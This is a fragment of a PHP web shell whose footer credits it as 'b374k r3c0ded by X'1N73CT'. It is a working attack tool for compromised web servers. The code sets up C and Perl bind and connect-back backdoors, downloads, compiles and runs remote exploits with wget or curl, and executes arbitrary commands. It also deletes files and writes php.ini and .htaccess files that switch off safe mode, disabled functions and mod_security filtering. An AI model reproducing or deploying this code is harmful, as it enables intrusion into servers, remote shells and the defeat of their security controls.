|
<tr><th colspan="2">Upload from computer</th></tr>
|
||
|
<tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td>
|
||
|
<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
|
||
|
</tr>
|
||
|
</table></form>
|
||
|
<table class="tabnet" style="width:320px;padding:0 1px;">
|
||
|
<tr><th colspan="2">Upload from url</th></tr>
|
||
|
<tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&x=upload">
|
||
|
<table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr>
|
||
|
<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
|
||
|
<tr><td><select size="1" class="inputz" name="pilihan">
|
||
|
<option value="wwget">wget</option>
|
||
|
<option value="wlynx">lynx</option>
|
||
|
<option value="wfread">fread</option>
|
||
|
<option value="wfetch">fetch</option>
|
||
|
<option value="wlinks">links</option>
|
||
|
<option value="wget">GET</option>
|
||
|
<option value="wcurl">curl</option>
|
||
|
</select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td>
|
||
|
</tr>
|
||
|
</table>
|
||
|
<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
|
||
|
<?php }
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){
|
||
|
|
||
|
// bind connect with c
|
||
|
if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) {
|
||
|
$port = trim($_POST['port']);
|
||
|
$passwrd = trim($_POST['bind_pass']);
|
||
|
tulis("bdc.c",$port_bind_bd_c);
|
||
|
exe("gcc -o bdc bdc.c");
|
||
|
exe("chmod 777 bdc");
|
||
|
@unlink("bdc.c");
|
||
|
exe("./bdc ".$port." ".$passwrd." &");
|
||
|
$scan = exe("ps aux");
|
||
|
if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
|
||
|
else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; }
|
||
|
}
|
||
|
// bind connect with perl
|
||
|
elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) {
|
||
|
$port = trim($_POST['port']);
|
||
|
$passwrd = trim($_POST['bind_pass']);
|
||
|
tulis("bdp",$port_bind_bd_pl);
|
||
|
exe("chmod 777 bdp");
|
||
|
$p2=which("perl");
|
||
|
exe($p2." bdp ".$port." &");
|
||
|
$scan = exe("ps aux");
|
||
|
if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
|
||
|
else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; }
|
||
|
}
|
||
|
// back connect with c
|
||
|
elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) {
|
||
|
$ip = trim($_POST['ip']);
|
||
|
$port = trim($_POST['backport']);
|
||
|
tulis("bcc.c",$back_connect_c);
|
||
|
exe("gcc -o bcc bcc.c");
|
||
|
exe("chmod 777 bcc");
|
||
|
@unlink("bcc.c");
|
||
|
exe("./bcc ".$ip." ".$port." &");
|
||
|
$msg = "Now script try connect to ".$ip." port ".$port." ...";
|
||
|
}
|
||
|
// back connect with perl
|
||
|
elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) {
|
||
|
$ip = trim($_POST['ip']);
|
||
|
$port = trim($_POST['backport']);
|
||
|
tulis("bcp",$back_connect);
|
||
|
exe("chmod +x bcp");
|
||
|
$p2=which("perl");
|
||
|
exe($p2." bcp ".$ip." ".$port." &");
|
||
|
$msg = "Now script try connect to ".$ip." port ".$port." ...";
|
||
|
}
|
||
|
elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd']))
|
||
|
{
|
||
|
$pilihan = trim($_POST['pilihan']);
|
||
|
$wurl = trim($_POST['wurl']);
|
||
|
$namafile = download($pilihan,$wurl);
|
||
|
if(is_file($namafile)) {
|
||
|
|
||
|
$msg = exe($wcmd);
|
||
|
}
|
||
|
else $msg = "error: file not found $namafile";
|
||
|
}
|
||
|
|
||
|
?>
|
||
|
<table class="tabnet">
|
||
|
<tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr>
|
||
|
<tr>
|
||
|
<td>
|
||
|
<table>
|
||
|
<form method="post" action="?y=<?php echo $pwd; ?>&x=netsploit">
|
||
|
<tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr>
|
||
|
<tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr>
|
||
|
<tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
|
||
|
<input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form>
|
||
|
</table>
|
||
|
</td>
|
||
|
<td>
|
||
|
<table>
|
||
|
<form method="post" action="?y=<?php echo $pwd; ?>&x=netsploit">
|
||
|
<tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>"></td></tr>
|
||
|
<tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr>
|
||
|
<tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
|
||
|
<input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form>
|
||
|
</table>
|
||
|
</td>
|
||
|
<td>
|
||
|
<table>
|
||
|
<form method="post" action="?y=<?php echo $pwd; ?>&x=netsploit">
|
||
|
<tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr>
|
||
|
<tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>
|
||
|
</tr>
|
||
|
<tr><td><select size="1" class="inputz" name="pilihan">
|
||
|
<option value="wwget">wget</option>
|
||
|
<option value="wlynx">lynx</option>
|
||
|
<option value="wfread">fread</option>
|
||
|
<option value="wfetch">fetch</option>
|
||
|
<option value="wlinks">links</option>
|
||
|
<option value="wget">GET</option>
|
||
|
<option value="wcurl">curl</option>
|
||
|
</select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form>
|
||
|
</table>
|
||
|
</td>
|
||
|
</tr>
|
||
|
</table>
|
||
|
<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
|
||
|
<?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=shell" method="post">
|
||
|
<table class="cmdbox">
|
||
|
<tr><td colspan="2">
|
||
|
<textarea class="output" readonly>
|
||
|
<?php
|
||
|
if(isset($_POST['submitcmd'])) {
|
||
|
echo @exe($_POST['cmd']);
|
||
|
}
|
||
|
?>
|
||
|
</textarea>
|
||
|
<tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr>
|
||
|
</table>
|
||
|
</form>
|
||
|
<?php }
|
||
|
else {
|
||
|
if(isset($_GET['delete']) && ($_GET['delete'] != "")){
|
||
|
$file = $_GET['delete'];
|
||
|
@unlink($file);
|
||
|
}
|
||
|
elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){
|
||
|
@rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR));
|
||
|
}
|
||
|
elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){
|
||
|
$path = $pwd.$_GET['mkdir'];
|
||
|
@mkdir($path);
|
||
|
}
|
||
|
$buff = showdir($pwd,$prompt);
|
||
|
echo $buff;
|
||
|
}
|
||
|
?>
|
||
|
<br><input class=inputzbut align=left type=submit name=ini value="Bypass Disable Functions and Safemode" />
|
||
|
<?php
|
||
|
if(isset($_POST['ini']))
|
||
|
{
|
||
|
|
||
|
$byphp = "safe_mode = Off
|
||
|
disable_functions = None
|
||
|
safe_mode_gid = OFF
|
||
|
open_basedir = OFF
|
||
|
allow_url_fopen = On";
|
||
|
$byht = "<IfModule mod_security.c>
|
||
|
SecFilterEngine Off
|
||
|
SecFilterScanPOST Off
|
||
|
SecFilterCheckURLEncoding Off
|
||
|
SecFilterCheckUnicodeEncoding Off
|
||
|
</IfModule>";
|
||
|
file_put_contents("php.ini",$byphp);
|
||
|
file_put_contents(".htaccess",$byht);
|
||
|
echo "<script>alert('Disable Functions and Safemode Created'); hideAll();</script>";
|
||
|
die();
|
||
|
|
||
|
}
|
||
|
|
||
|
?><center><br><br><div class="info">-=[ b374k r3c0ded by <b>X'1N73CT</b> ]=-</div><br>
|
||
|
<div class="jaya">© 2013 X'1N73CT</div></center><br><br>
|
||
|
</script>
|
||
|
</div>
|
||
|
</body>
|
||
|
</html>
|
||
|
<?php
|
||
|
function rooting()
|
||
|
{
|
||
|
echo '<b>Sw Bilgi<br><br>'.php_uname().'<br></b>';
|
||
|
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
|
||
|
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
|
||
|
if( $_POST['_upl'] == "Upload" ) {
|
||
|
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Yuklendi</b><br><br>'; }
|
||
|
else { echo '<b>Basarisiz</b><br><br>'; }
|
||
|
}
|
||
|
}
|
||
|
$x = $_GET["x"];
|
||
|
Switch($x){
|
||
|
case "rooting";
|
||
|
rooting();
|
||
|
break;
|
||
|
|
||
|
}
|
||
|
?>
|